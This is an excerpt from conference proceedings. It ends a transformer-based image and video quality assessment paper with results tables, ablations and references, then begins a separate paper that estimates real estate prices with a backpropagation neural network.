| TRIQ | 0.922 ± 0.018 | 0.910 ± 0.011 | 0.223 ± 0.030 | 0.916 ± 0.027 | 0.925 ± 0.015 | 0.324 ± 0.021 |
| MUSIQ | 0.925 ± 0.011 | 0.913 ± 0.029 | 0.216 ± 0.026 | 0.920 ± 0.010 | 0.918 ± 0.006 | 0.339 ± 0.030 |
| AIHIQnet | 0.929 ± 0.020 | 0.915 ± 0.014 | 0.209 ± 0.022 | 0.929 ± 0.022 | 0.925 ± 0.019 | 0.326 ± 0.027 |
| CaHDC | 0.856 ± 0.027 | 0.817 ± 0.025 | 0.370 ± 0.041 | 0.824 ± 0.030 | 0.815 ± 0.019 | 0.486 ± 0.068 |
| hyperIQA | 0.916 ± 0.030 | 0.907 ± 0.027 | 0.242 ± 0.012 | 0.910 ± 0.026 | 0.915 ± 0.020 | 0.329 ± 0.028 |
| MCAS-IQA | 0.956 ± 0.020 | 0.944 ± 0.015 | 0.163 ± 0.023 | 0.933 ± 0.021 | 0.926 ± 0.021 | 0.304 ± 0.020 |
In order to fully reveal the benefit of the multi-stage channel attention architecture, we have conducted three ablation studies: 1) No multi-stage and no channel attention: the output from the last Swin Transformer block is averaged and then fed into the head layer directly; 2) No multi-stage but with channel attention: the channel attention layer is applied to the output from the last Swin Transformer block; and 3) Multi-stage without channel attention: the outputs from the four Swin Transformer blocks are averaged and then fed into the head layer. Table 2 presents the results in terms of the criteria averaged over KonIQ-10k and SPAQ. The ablation studies confirm that using the multi-stage and shared channel attention architecture dramatically improves the performance on IQA. Furthermore, it seems that using channel attention offers more benefit than the multi-stage approach in the proposed MCAS-IQA architecture. Subsequently, we have conducted another experiment to evaluate the generalization capability of MCAS-IQA, as reported in Table 3. The model was first trained on one dataset and then tested on another dataset, e.g., KonIQ-10k vs. SPAQ indicates that MCAS-IQA was trained on KonIQ-10k and tested on the entire SPAQ dataset, and vice versa. We have also trained MCAS-IQA on the combination of KonIQ-10k and SPAQ and then tested it on the entire CID2013 and CLIVE datasets, respectively. According to the evaluation results, MCAS-IQA shows strong generalization capability across datasets and subjective experiments, which provides a solid foundation for using MCAS-IQA as a general model to derive
quality features for VQA. Thus, MCAS-IQA trained on the combination of KonIQ-10k and SPAQ has been employed to compute the quality features of every frame in video sequences for the VQA experiments.

Table 2. Ablation studies on MCAS-IQA

| Ablations | PLCC | SROCC | RMSE |
|---|---|---|---|
| Original MCAS-IQA | 0.945 | 0.935 | 0.234 |
| 1) No multi-stage, no channel attention | 0.913 | 0.903 | 0.302 |
| 2) No multi-stage, with channel attention | 0.936 | 0.919 | 0.280 |
| 3) Multi-stage, without channel attention | 0.925 | 0.927 | 0.258 |
Table 3. Model generalization studies

| Datasets | PLCC | SROCC | RMSE |
|---|---|---|---|
| KonIQ-10k vs. SPAQ | 0.861 | 0.875 | 0.454 |
| SPAQ vs. KonIQ-10k | 0.834 | 0.829 | 0.309 |
| Tested on CID2013 | 0.858 | 0.853 | 0.602 |
| Tested on CLIVE | 0.864 | 0.877 | 0.584 |
Table 4. Evaluation results (average and standard deviation) on the test set on individual VQA datasets

| Models | KonViD-1k PLCC↑ | KonViD-1k SROCC↑ | KonViD-1k RMSE↓ | YouTube-UGC PLCC↑ | YouTube-UGC SROCC↑ | YouTube-UGC RMSE↓ |
|---|---|---|---|---|---|---|
| TLVQM | 0.76 ± 0.02 | 0.76 ± 0.02 | 0.42 ± 0.03 | 0.68 ± 0.03 | 0.65 ± 0.03 | 0.49 ± 0.02 |
| VSFA | 0.80 ± 0.03 | 0.80 ± 0.02 | 0.40 ± 0.03 | 0.77 ± 0.03 | 0.79 ± 0.04 | 0.41 ± 0.03 |
| 3D-CNN | 0.80 ± 0.02 | 0.81 ± 0.03 | 0.38 ± 0.02 | 0.71 ± 0.03 | 0.72 ± 0.04 | 0.44 ± 0.02 |
| VIDEAL | 0.67 ± 0.02 | 0.65 ± 0.02 | 0.50 ± 0.03 | 0.66 ± 0.03 | 0.68 ± 0.03 | 0.49 ± 0.02 |
| LSCT | 0.84 ± 0.02 | 0.85 ± 0.02 | 0.34 ± 0.03 | 0.82 ± 0.04 | 0.82 ± 0.03 | 0.39 ± 0.02 |
| ST-3DDCT | 0.73 ± 0.02 | 0.74 ± 0.02 | 0.44 ± 0.03 | 0.48 ± 0.04 | 0.49 ± 0.04 | 0.59 ± 0.03 |
| StarVQA | 0.80 ± 0.04 | 0.80 ± 0.03 | 0.40 ± 0.02 | 0.80 ± 0.06 | 0.78 ± 0.03 | 0.44 ± 0.02 |
| LSAT-VQA | 0.85 ± 0.02 | 0.84 ± 0.02 | 0.33 ± 0.02 | 0.85 ± 0.03 | 0.83 ± 0.03 | 0.38 ± 0.03 |
Table 5. Evaluation results (average and standard deviation) on the combined dataset

| Models | Combined test set PLCC↑ | SROCC↑ | RMSE↓ |
|---|---|---|---|
| TLVQM | 0.71 ± 0.02 | 0.74 ± 0.02 | 0.46 ± 0.02 |
| VSFA | 0.79 ± 0.02 | 0.79 ± 0.03 | 0.44 ± 0.03 |
| 3D-CNN | 0.71 ± 0.02 | 0.72 ± 0.02 | 0.49 ± 0.02 |
| VIDEAL | 0.67 ± 0.02 | 0.67 ± 0.12 | 0.57 ± 0.02 |
| LSCT | 0.81 ± 0.04 | 0.80 ± 0.03 | 0.41 ± 0.05 |
| ST-3DDCT | 0.59 ± 0.03 | 0.60 ± 0.02 | 0.58 ± 0.02 |
| StarVQA | 0.77 ± 0.05 | 0.79 ± 0.04 | 0.48 ± 0.04 |
| LSAT-VQA | 0.84 ± 0.02 | 0.83 ± 0.04 | 0.40 ± 0.04 |
Table 6. Performance evaluation and inference time relative to LSAT-VQA on LIVE-VQC dataset

| Models | PLCC | SROCC | RMSE | Time |
|---|---|---|---|---|
| TLVQM | 0.432 | 0.450 | 0.593 | 4.8 |
| VSFA | 0.663 | 0.640 | 0.540 | 2.3 |
| 3D-CNN | 0.598 | 0.603 | 0.522 | 2.7 |
| VIDEAL | 0.495 | 0.445 | 0.601 | 7.2 |
| LSCT | 0.702 | 0.730 | 0.497 | 3.4 |
| ST-3DDCT | 0.474 | 0.489 | 0.607 | 1.4 |
| StarVQA | 0.667 | 0.705 | 0.528 | 1.5 |
| LSAT-VQA | 0.724 | 0.726 | 0.490 | 1.0 |
4.4 Experiments on VQA Models

For VQA, LSAT-VQA has been compared against the following state-of-the-art models: TLVQM [6], VSFA [22], 3D-CNN [23], VIDEAL [24], LSCT [25], ST-3DDCT [27] and StarVQA [31]. Tables 4 and 5 report the average and standard deviation of the evaluation criteria on the individual VQA datasets and on their combination, respectively. When using the combined dataset, the train sets and validation sets from KonViD-1k and YouTube-UGC were combined, respectively, in each of the ten random splits to train the VQA models, which were then evaluated on the combined test sets. According to the comparison results, the proposed LSAT-VQA model shows dramatically better performance than the compared models. We assume that the reasons are again twofold. First, the proposed MCAS-IQA model, which has been trained specifically for IQA, provides a solid foundation for deriving frame features that represent perceptual quality information. Second, the locally shared attention module based on transformer can appropriately represent the VQA mechanism in the temporal domain; in particular, the clipping operation and using
transformer for temporal pooling over clips are in accordance with the subjective process performed by human viewers in VQA. Table 6 reports the evaluation results of the models trained on the combined KonViD-1k and YouTube-UGC dataset and then tested independently on the LIVE-VQC dataset. Due to the high diversity of video contents and quality levels, it is expected that VQA models should have weak generalization capability. However, the proposed LSAT-VQA model still shows promising potential to become a general VQA model that can be applied to a wide range of video contents, resolutions, and distortions. In addition, we have also compared the inference time of different VQA models on the LIVE-VQC dataset. The average inference time, including feature derivation and quality prediction, was computed. The proposed VQA model is the fastest, e.g., it takes about 300 ms for an HD video of 5 s duration. Table 6 also reports a rough comparison of the inference time of the other models relative to the proposed LSAT-VQA model. Furthermore, LSAT-VQA is lightweight, and the size of the model file is only about 5 MB.

Table 7. Evaluation results of LSAT in the ablation studies

| Ablations | PLCC | SROCC | RMSE |
|---|---|---|---|
| Original LSAT-VQA | 0.843 | 0.834 | 0.398 |
| 1) MHA_S: [64, 4] | 0.841 | 0.834 | 0.401 |
| 1) MHA_S: [1024, 8] | 0.836 | 0.830 | 0.412 |
| 2) No locally shared attention | 0.765 | 0.796 | 0.451 |
| 3) Clip length: 8 | 0.849 | 0.834 | 0.399 |
| 3) Clip length: 128 | 0.838 | 0.831 | 0.404 |
| 4) Transformer: [2, 32, 4, 64] | 0.842 | 0.835 | 0.399 |
| 4) Transformer: [4, 256, 8, 1024] | 0.836 | 0.829 | 0.308 |
| 5) LSAT on ResNet50 features | 0.829 | 0.827 | 0.426 |
Considering that the complexity of the global transformer is directly determined by the input length, sharing and reusing the local MHA in all the non-overlapping clips can dramatically reduce the length of the transformer input. Thus, it is important to dig into the architecture of building transformer on top of locally shared MHA. The first three ablation experiments are focused on comparing variations of the shared MHA layer, its influence on VQA, and clip length. In addition, another ablation has also been conducted to study the hyper-parameter settings of the global transformer. Finally, in order to evaluate the influence of dedicated IQA models on video quality perception against other pretrained image models, the ImageNet pretrained ResNet50 is used to extract features from video frames and then fed into the proposed LSAT-VQA model in the fifth ablation. All the ablation studies were performed on the combined dataset of KonViD-1k and YouTube-UGC. The following summarizes the ablation experiments and Table 7 reports the average results over the ten random splits.
1) Set the dimension and head number in the locally shared MHA layer to [64, 4] and [1024, 8], respectively;
2) Do not use the locally shared MHA layer, i.e., the frame quality features are fed into the transformer encoder directly;
3) Set the clip length to 8 and 128, respectively;
4) Test two hyper-parameter settings in the global transformer;
5) Feed the ResNet50 features into LSAT-VQA.

According to the ablation studies, the setting of the locally shared MHA is not crucial for the performance of LSAT-VQA. However, using a sole transformer encoder without the locally shared MHA significantly degrades the performance. This partly confirms our assumption that the proposed local-global structure is appropriate for VQA, which is also in line with the observation that viewers often gauge video quality based on temporal pooling over clips, rather than frames. Furthermore, it is observed that a relatively short clip length seems to produce slightly better performance in the proposed LSAT architecture. Considering that a longer clip length reduces the complexity of the transformer further, it is worth finding an optimal balance between clip length and model accuracy. In our experiments, we have found that a clip length of 32 generally offers the optimal performance in video quality prediction. In addition, even though large transformer models often show outstanding performance in language modelling and computer vision tasks, this is not the case in our experiments. For example, the deep transformer encoder in ablation 4) does not produce higher performance than the shallow one. Our hypothesis is that training on relatively small-scale VQA datasets cannot take full advantage of large models. Finally, the last ablation study demonstrates that a dedicated and retrained IQA model definitely benefits VQA tasks more than a pretrained image classification model.
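The trade-off between clip length and transformer complexity can be made concrete with a rough count of pairwise attention scores. The sketch ignores heads, feature dimensions and constant factors, and the 240-frame video is a hypothetical example; it only illustrates how the clip length shifts cost between the local shared attention and the global transformer.

```python
import math


def attention_pairs(num_frames, clip_len):
    """Count pairwise attention scores for a video split into non-overlapping clips."""
    num_clips = math.ceil(num_frames / clip_len)
    return {
        "clips": num_clips,                          # input length of the global transformer
        "local_pairs": num_clips * clip_len ** 2,    # scores inside all clips (shared MHA)
        "global_pairs": num_clips ** 2,              # scores between clips (global encoder)
        "frame_level_pairs": num_frames ** 2,        # a transformer applied directly to frames
    }


for clip_len in (8, 32, 128):
    print(clip_len, attention_pairs(240, clip_len))
```

Under this count, longer clips shrink the global transformer input but make the local attention more expensive, which is consistent with looking for a balance such as the clip length of 32 reported above.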
5 Conclusion

This paper proposed an efficient and general framework for no-reference image and video quality assessment based on windowed transformers. Considering several important visual mechanisms in IQA, a multi-stage channel attention model, MCAS-IQA, built on Swin Transformer as the backbone has been developed. MCAS-IQA demonstrates outstanding performance in predicting perceived image quality whilst providing generic image quality features for VQA. Subsequently, inspired by the subjective mechanism that video quality is potentially a fusion of quality assessments over short video segments, we proposed a locally shared attention module followed by a global transformer for VQA. By reusing local attention across video clips, the proposed LSAT-VQA model accurately predicts video quality in an efficient manner. Comprehensive comparison experiments have demonstrated the outstanding performance of the proposed IQA and VQA models. The ablation studies have also revealed the influence of individual building components, driven by relevant visual mechanisms, on image and video quality assessment.
References

1. Wang, Z., Sheikh, H.R., Bovik, A.C.: Objective video quality assessment. In: The Handbook of Video Databases: Design and Applications, pp. 1041–1078. CRC Press (2003)
2. Sazaad, P.Z.M., Kawayoke, Y., Horita, Y.: No reference image quality assessment for JPEG2000 based on spatial features. Signal Process. Image Commun. 23(4), 257–268 (2008)
3. Shahid, M., Rossholm, A., Lövström, B., Zepernick, H.-J.: No-reference image and video quality assessment: a classification and review of recent approaches. EURASIP Journal on Image and Video Processing 2014(1), 1–32 (2014). https://doi.org/10.1186/1687-5281-2014-40
4. Mittal, A., Moorthy, A.K., Bovik, A.C.: No-reference image quality assessment in the spatial domain. IEEE Trans. Image Process. 21(12), 4695–4708 (2012)
5. Saad, M.A., Bovik, A.C., Charrier, C.: Blind prediction of natural video quality. IEEE Trans. Image Process. 23(3), 1352–1365 (2014)
6. Korhonen, J.: Two-level approach for no-reference consumer video quality assessment. IEEE Trans. Image Process. 28(12), 5923–5938 (2019)
7. Bianco, S., Celona, L., Napoletano, P., Schettini, R.: On the use of deep learning for blind image quality assessment. SIViP 12(2), 355–362 (2017). https://doi.org/10.1007/s11760-017-1166-8
8. Hosu, V., Lin, H., Sziranyi, T., Saupe, D.: KonIQ-10k: An ecologically valid database for deep learning of blind image quality assessment. IEEE Trans. Image Process. 29, 4041–4056 (2020)
9. Itti, L., Koch, C.: Computational modelling of visual attention. Nat. Rev. Neurosci. 2, 194–203 (2001)
10. Engelke, U., Kaprykowsky, H., Zepernick, H.-J., Ndjiki-Nya, P.: Visual attention in quality assessment. IEEE Signal Process. Mag. 28(6), 50–59 (2011)
11. Kelly, H.: Visual contrast sensitivity. Optica Acta: Int. J. Opt. 24(2), 107–112 (1977)
12. Geisler, W.S., Perry, J.S.: A real-time foveated multi-resolution system for low-bandwidth video communication. In: SPIE Human Vision Electron. Imaging, San Jose, CA, USA, vol. 3299, pp. 294–305 (1998)
13. Zhang, X., Lin, W., Xue, P.: Just-noticeable difference estimation with pixels in images. J. Vis. Commun. 19(1), 30–41 (2007)
14. You, J., Korhonen, J.: Transformer for image quality assessment. In: IEEE International Conference on Image Processing (ICIP), Anchorage, Alaska, USA (2021)
15. Ke, J., Wang, O., Wang, Y., Milanfar, P., Yang, F.: MUSIQ: Multi-scale image quality transformer. In: IEEE/CVF International Conference on Computer Vision (ICCV), Virtual (2021)
16. You, J., Korhonen, J.: Attention integrated hierarchical networks for no-reference image quality assessment. J. Vis. Commun. 82 (2022)
17. Wu, J., Ma, J., Liang, F., Dong, W., Shi, G., Lin, W.: End-to-end blind image quality prediction with cascaded deep neural network. IEEE Trans. Image Process. 29, 7414–7426 (2020)
18. Su, S., Yan, Q., Zhu, Y., Zhang, C., Ge, X., Sun, J., Zhang, Y.: Blindly assess image quality in the wild guided by a self-adaptive hyper network. In: IEEE Computer Society Conference on Computer Vision and Pattern Recognition (CVPR), Virtual (2020)
19. Karpathy, A., Toderici, G., Shetty, S., Leung, T., Sukthankar, R., Li, F.-F.: Large-scale video classification with convolutional neural networks. In: IEEE Computer Society Conference on Computer Vision and Pattern Recognition (CVPR), Columbus, OH, USA (2014)
20. Varga, D., Szirányi, T.: No-reference video quality assessment via pretrained CNN and LSTM networks. Signal Image Video Proc. 13, 1569–1576 (2019)
472
J. You and Z. Zhang
21. Korhonen, J., Su, Y., You, J.: Blind natural video quality prediction via statistical temporal features and deep spatial features. In: ACM International Conference Multimedia (MM), Seattle, United States (2020) 22. Li, D., Jiang, T., Jiang, M.: Quality assessment of in-the-wild videos. In: ACM International Conference Multimedia (MM), Nice France (2019) 23. You, J., Korhonen, J.: Deep neural networks for no-reference video quality assessment. In: IEEE International Conference on Image Processing (ICIP), Taipei, Taiwan (2019) 24. Tu, Z., Wang, Y., Birkbeck, N., Adsumilli, B., Bovik, A.C.: UGC-VQA: Benchmarking blind video quality assessment for user generated content. IEEE Trans. Image Process. 30, 4449–4464 (2021) 25. You, J.: Long short-term convolutional transformer for no-reference video quality assessment. In: ACM International Conference Multimedia (MM), Chengdu, China (2021) 26. Göring, S., Skowronek, J., Raake, A.: DeViQ - A deep no reference video quality model. In: Proceedings of Human Vision and Electronic Imaging (HVEI), Burlingame, California USA (2018) 27. Li, X., Guo, Q., Lu, X.: Spatiotemporal statistics for video quality assessment. IEEE Trans. Image Process. 25(7), 3329–3342 (2018) 28. Lu, Y., Wu, J., Li, L., Dong, W., Zhang, J., Shi, G.: Spatiotemporal representation learning for blind video quality assessment. IEEE Trans. Circuits Syst. Video Technol. 32(6), 3500–3513 (2021) 29. Vaswani, A., et al.: Attention is all your need. In: Advance in Neural Information Processing System (NIPS), Long Beach, CA, USA (2017) 30. Devlin, J., Chang, M.-W., Lee, K., Toutanova, K.: BERT: Pre-training of deep bidirectional transformers for language understanding. In: Proceedings of NAACL-HLT, vol. 1, pp. 4171– 4186, Minneapolis, Minnesota, USA (2019) 31. Xing, F., Wang, Y-G., Wang, H., Li, L., and Zhu, G.: StarVQA: Space-time attention for video quality assessment. https://doi.org/10.48550/arXiv.2108.09635 (2021) 32. 
Kitaev, N., Kaiser, L., Levskaya, A.: Reformer: The efficient Transformer. In: International Conference on Learning Representations (ICLR), Virtual (2020) 33. Zhu, C., et al.: Long-short Transformer: Efficient Transformers for language and vision. In: Advance in Neural Information Processing System (NeurIPS), Virtual (2021) 34. Liu, Z., et al.: Swin Transformer: Hierarchical vision Transformer using shifted windows. In: IEEE/CVF International Conference on Computer Vision (ICCV), Virtual (2021) 35. Dosovitskiy, A., et al.: An image is worth 16x16 words: Transformers for image recognition at scale. In: International Conference on Learning Representations (ICLR), Virtual (2021) 36. Fang, Y., Zhu, H., Zeng, Y., Ma, K., Wang, Z.: Perceptual quality assessment of smartphone photography. In: IEEE Computer Society Conference on Computer Vision and Pattern Recogniton (CVPR), Virtual (2020) 37. Hosu, V., et al.: The Konstanz natural video database (KoNViD-1k). In: International Conference on Quality of Multimedia Experience (QoMEX), Erfurt, Germany (2017) 38. Wang, Y., Inguva, S., Adsumilli, B.: YouTube UGC dataset for video compression research. In: International Workshop on Multimedia Signal Processing (MMSP), Kuala Lumpur, Malaysia (2019) 39. Ying, Z., Niu, H., Gupta, P., Mahajan, D., Ghadiyaram, D., Bovik A.C.: From patches to pictures (PaQ-2-PiQ): Mapping the perceptual space of picture quality. In: IEEE Computer Society Conference on Computer Vision and Pattern Recogniton (CVPR), Virtual (2020) 40. Zhang, W., Ma, K., Zhai, G., Yang, X.: Uncertainty-aware blind image quality assessment in the laboratory and wild. IEEE Trans. Image Process 30, 3474–3486 (2021) 41. Li, D., Jiang, T., Jiang, M.: Unified quality assessment of in-the-wild videos with mixed datasets training. Int. J. Comput. Vis. 129, 1238–1257 (2021)
Visual Mechanisms Inspired Efficient Transformers
473
42. ITU-T Recommendation P.910. Subjective video quality assessment methods for multimedia applications,” ITU (2008) 43. Virtanen, T., Nuutinen, M., Vaahteranoksa, M., Oittinen, P., Häkkinen, J.: CID2013: A database for evaluating no-reference image quality assessment algorithms. IEEE Trans. Image Process 24(1), 390–402 (2015) 44. Ghadiyaram, D., Bovik, A.C.: Massive online crowdsourced study of subjective and objective picture quality. IEEE Trans. Image Process 25(1), 372–387 (2016) 45. Sinno, Z., Bovik, A.C.: Large-scale study of perceptual video quality. IEEE Trans. Image Process. 28(2), 612–627 (2019) 46. Jung, A.B., Wada, K., Crall, J., et al.: Imgaug, https://github.com/aleju/imgaug
A Neural Network Based Approach for Estimation of Real Estate Prices
Ventsislav Nikolov
Technical University of Varna, Varna, Bulgaria
[email protected]
Abstract. This paper proposes an automated approach for estimating real estate prices from historical examples. The approach is based on a neural network whose input data are the numerical values of various characteristics of the real estate under consideration. The output data are the prices, and the examples can be grouped according to a restriction on the time period for selling.
Keywords: Real estates · Prices estimation · Neural network · Training examples
1 Introduction
The real estate market has grown quickly in recent years. It prospers especially during the years of economic development between crises. Real estate is a long-term investment option and remains practically useful even if its current price is below the prime cost. However, not all real estate sells easily, and the selling period sometimes lasts a long time. One of the challenges for real estate agencies and owners is to determine the best price for a property that is for sale. Normally this is done by relying on the experience of the agency broker or on the owner’s research into the market prices of similar properties. Moreover, the statistics in most existing web-based real estate software systems show only historical prices (Fig. 1). This paper proposes an automated approach for price suggestion based on historical purchases of real estate with different characteristics. It could help both real estate agencies and owners determine the price that will most probably lead to a fast and profitable sale.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 474–481, 2023. https://doi.org/10.1007/978-3-031-28073-3_34
Fig. 1. Historical Real Estate Prices.
2 The Proposed Approach
The proposed approach is based on training a neural network with examples of real estate that has already been sold. Every property should have a numerical assessment of a number of characteristics, such as:
• number of rooms;
• distance to the city center;
• distance to transport points such as an airport, bus station or train station;
• distance to the nearest building;
• area in square meters;
• orientation (east, south, west or north);
• etc.
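As an illustration of what such a numerical assessment could look like, the following minimal Python sketch turns one listing into an input vector. The field names, the units and the orientation codes are assumptions made for this example only; they are not taken from the prototype.

```python
# Hypothetical numeric encoding of one listing.
# Field names, units and orientation codes are illustrative assumptions.
ORIENTATION_CODES = {"east": 0.0, "south": 1.0, "west": 2.0, "north": 3.0}

def encode_listing(listing):
    """Return the characteristics of a listing as a list of floats."""
    return [
        float(listing["rooms"]),
        float(listing["km_to_center"]),
        float(listing["km_to_transport"]),
        float(listing["m_to_nearest_building"]),
        float(listing["area_sq_m"]),
        ORIENTATION_CODES[listing["orientation"]],
    ]

example = {
    "rooms": 3,
    "km_to_center": 2.5,
    "km_to_transport": 1.2,
    "m_to_nearest_building": 15,
    "area_sq_m": 78,
    "orientation": "south",
}
x = encode_listing(example)
print(x)  # [3.0, 2.5, 1.2, 15.0, 78.0, 1.0]
```

A single numeric code for orientation imposes an ordering on the four directions; encoding each direction as a separate 0/1 input would be one alternative if that ordering is not wanted.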
One of the main characteristics of neural networks is that they work only with numerical values. Given a large number of examples of successfully sold real estate, the neural network can predict the best price for a property newly offered on the market. Normally neural networks work in two stages, training and generation [6] of output data for new, unknown input data, but there is no single approach to training them. There are different architectures and training algorithms [1, 4, 5, 10], the main goal of which is to obtain optimal weight values for the connections between neurons. An implementation of the backpropagation algorithm for the multilayer perceptron architecture [3, 7, 8, 9] is presented below (Fig. 2).

Fig. 2. Multilayer perceptron architecture. (Diagram: input neurons, e.g. area in sq. m, distance to city center, …; hidden neurons; output neurons, e.g. price.)

2.1 Training
Input vectors are denoted by x and output vectors by y. The number of input neurons is A, the number of hidden neurons is B, and the number of outputs is C. The output values of the input neurons are denoted by $x_i$, those of the hidden neurons by $h_j$, and those of the outputs by $o_k$. Index i is used for the input neurons, j for the hidden neurons, and k for the output neurons. Every neuron in a given layer is connected to every neuron in the next layer. These connections have associated weights: $w_{ji}$ between the input and hidden layers, and $w_{kj}$ between the hidden and output layers. A and C are determined by the dimensions of the input and output vectors of the training examples; B in our implementation is determined by the formula $B = \sqrt{A \cdot C}$, rounded to the nearest integer. The output values of the input elements are the same as their input values $x_1 \ldots x_A$, but the other layers use a bipolar sigmoid activation function [2]. The data should therefore be transformed into the range of the bipolar sigmoid, from −1 to 1. This is done in the following way. Minimal and maximal values are calculated for the input and output values:
$$\mathit{min}_{in} = \min(x) \tag{1}$$
$$\mathit{min}_{out} = \min(y) \tag{2}$$
$$\mathit{max}_{in} = \max(x) \tag{3}$$
$$\mathit{max}_{out} = \max(y) \tag{4}$$
The ranges of the input and output values are calculated:
$$R_{in} = \mathit{max}_{in} - \mathit{min}_{in} \tag{5}$$
$$R_{out} = \mathit{max}_{out} - \mathit{min}_{out} \tag{6}$$
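The minimal and maximal values of the interval to which inputs and outputs have to be transformed (the normalization interval) are set, and its range is calculated:
$$\mathit{min}_{norm} = -1 \tag{7}$$
$$\mathit{max}_{norm} = 1 \tag{8}$$
$$R_{norm} = \mathit{max}_{norm} - \mathit{min}_{norm} \tag{9}$$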
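Coefficients of scaling and shifting are determined for input and output values:
$$\mathit{Scale}_{in} = \frac{R_{norm}}{R_{in}} \tag{10}$$
$$\mathit{Scale}_{out} = \frac{R_{norm}}{R_{out}} \tag{11}$$
$$\mathit{Shift}_{in} = \mathit{min}_{norm} - \mathit{min}_{in} \cdot \mathit{Scale}_{in} \tag{12}$$
$$\mathit{Shift}_{out} = \mathit{min}_{norm} - \mathit{min}_{out} \cdot \mathit{Scale}_{out} \tag{13}$$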
For every value from the input vectors x, the transformed value $xs_i$ is calculated within the interval from $\mathit{min}_{norm}$ to $\mathit{max}_{norm}$:
$$xs_i = x_i \cdot \mathit{Scale}_{in} + \mathit{Shift}_{in} \tag{14}$$
Transformed values for the output vectors are calculated in the same way:
$$ys_k = y_k \cdot \mathit{Scale}_{out} + \mathit{Shift}_{out} \tag{15}$$
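The scaling in (1) to (15) can be sketched in a few lines of Python. This is a minimal illustration, not the prototype's code: the function names and the sample areas are assumptions, and whether the minimum and maximum are taken per characteristic or over all values is left to the caller.

```python
def fit_scaling(values, min_norm=-1.0, max_norm=1.0):
    """Return (scale, shift) for a list of raw values, following (1)-(13)."""
    lo, hi = min(values), max(values)
    value_range = hi - lo                        # (5)-(6)
    if value_range == 0:
        raise ValueError("all values are equal, so the range is zero")
    scale = (max_norm - min_norm) / value_range  # (9)-(11)
    shift = min_norm - lo * scale                # (12)-(13)
    return scale, shift

def transform(value, scale, shift):
    """Map a raw value into the normalization interval, as in (14)-(15)."""
    return value * scale + shift

areas = [40.0, 60.0, 100.0]  # illustrative areas in square meters
scale_in, shift_in = fit_scaling(areas)
scaled = [transform(a, scale_in, shift_in) for a in areas]
# The smallest area maps to about -1, the largest to about 1,
# and 60.0 maps to about -1/3.
```

The same two functions apply to the prices, which gives the output scale and shift used later when the network output is transformed back.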
The neural network is trained with $xs_i$ and $ys_k$ for a given number of epochs. In every epoch all training patterns are presented to the neural network, and the weights of the connections between neurons are modified with a step called the learning rate. In every epoch, the following calculations are performed for every training pattern.

Forward Stage
The weighted input sum is calculated for every neuron in the hidden layer:
$$\mathit{net}_j = \sum_{i=1}^{A} xs_i \, w_{ji} \tag{16}$$
Output values for the hidden neurons are calculated:
$$h_j = f(\mathit{net}_j) \tag{17}$$
In the same way the weighted input sum is calculated for the neurons in the output layer:
$$\mathit{net}_k = \sum_{j=1}^{B} h_j \, w_{kj} \tag{18}$$
$$o_k = f(\mathit{net}_k) \tag{19}$$
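The forward stage (16) to (19) can be sketched as follows. The sketch assumes the standard bipolar sigmoid f(x) = 2 / (1 + e^(−x)) − 1 without a steepness parameter, which the text does not spell out; the weight values and the names `forward`, `w_hidden` and `w_output` are illustrative.

```python
import math

def bipolar_sigmoid(net):
    """Assumed activation: 2 / (1 + exp(-net)) - 1, which equals tanh(net / 2)."""
    return math.tanh(net / 2.0)

def forward(xs, w_hidden, w_output):
    """Forward stage; w_hidden[j][i] plays the role of w_ji, w_output[k][j] of w_kj."""
    h = [bipolar_sigmoid(sum(w * x for w, x in zip(row, xs)))
         for row in w_hidden]   # (16)-(17)
    o = [bipolar_sigmoid(sum(w * h_j for w, h_j in zip(row, h)))
         for row in w_output]   # (18)-(19)
    return h, o

xs = [0.5, -0.2]                        # A = 2 scaled inputs
w_hidden = [[0.1, 0.4], [-0.3, 0.2]]    # B = 2 hidden neurons
w_output = [[0.25, -0.5]]               # C = 1 output neuron
h, o = forward(xs, w_hidden, w_output)
```

Writing the activation as tanh(net / 2) avoids the overflow that exp(−net) can cause for large negative sums while giving the same values.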
Backward Stage
For every output neuron the error is calculated as:
$$\varepsilon = \frac{1}{2}\,(ys_k - o_k)^2 \tag{20}$$
In order to calculate the modification of the connection weights between the hidden and output neurons, the following gradient descent formula is used:
$$\Delta w_{kj} = -\eta \, \frac{\partial \varepsilon}{\partial w_{kj}} \tag{21}$$
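where η is the learning rate, which should be known before training and is normally a small real value that determines the convergence rate. The next multiplier (the error derivative) is determined in the following way:
$$\frac{\partial \varepsilon}{\partial w_{kj}} = \frac{\partial \varepsilon}{\partial o_k} \, \frac{\partial o_k}{\partial \mathit{net}_k} \, \frac{\partial \mathit{net}_k}{\partial w_{kj}} \tag{22}$$
and taking into account that
$$\frac{\partial \varepsilon}{\partial o_k} = -(ys_k - o_k) \tag{23}$$
$$\frac{\partial o_k}{\partial \mathit{net}_k} = f'(\mathit{net}_k) \tag{24}$$
$$\frac{\partial \mathit{net}_k}{\partial w_{kj}} = h_j \tag{25}$$
it follows that
$$\frac{\partial \varepsilon}{\partial w_{kj}} = \frac{\partial \varepsilon}{\partial o_k} \, \frac{\partial o_k}{\partial \mathit{net}_k} \, \frac{\partial \mathit{net}_k}{\partial w_{kj}} = -(ys_k - o_k) \, f'(\mathit{net}_k) \, h_j \tag{26}$$
and the modification of the weight is
$$\Delta w_{kj} = \eta \, (ys_k - o_k) \, f'(\mathit{net}_k) \, h_j \tag{27}$$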
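The derivation uses f′ without giving its form. Assuming the standard bipolar sigmoid without a steepness parameter (the form given, for example, in [2]), the derivative can be written through the function value itself, which is convenient because the neuron outputs are already available from the forward stage:

```latex
f(x) = \frac{2}{1 + e^{-x}} - 1 = \tanh\!\left(\frac{x}{2}\right),
\qquad
f'(x) = \frac{1}{2}\,\bigl(1 + f(x)\bigr)\,\bigl(1 - f(x)\bigr)
```

Under this assumption, the factor $f'(\mathit{net}_k)$ in (27) equals $\frac{1}{2}(1 + o_k)(1 - o_k)$.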
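Taking the following substitution:
$$\delta_k = -\frac{\partial \varepsilon}{\partial o_k} \, \frac{\partial o_k}{\partial \mathit{net}_k} = (ys_k - o_k) \, f'(\mathit{net}_k) \tag{28}$$
the modification of the weights of the connections between the input and hidden layer neurons can be calculated as:
$$\Delta w_{ji} = -\eta \, \frac{\partial \varepsilon}{\partial w_{ji}} = \eta \sum_{k=1}^{C} w_{kj} \, \delta_k \, f'(\mathit{net}_j) \, xs_i \tag{29}$$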
After the modifications $\Delta w_{ji}$ and $\Delta w_{kj}$ are applied, the steps from (16) to (29) are repeated for all training patterns. If the stop criterion of the training is still not met, these steps are performed again.
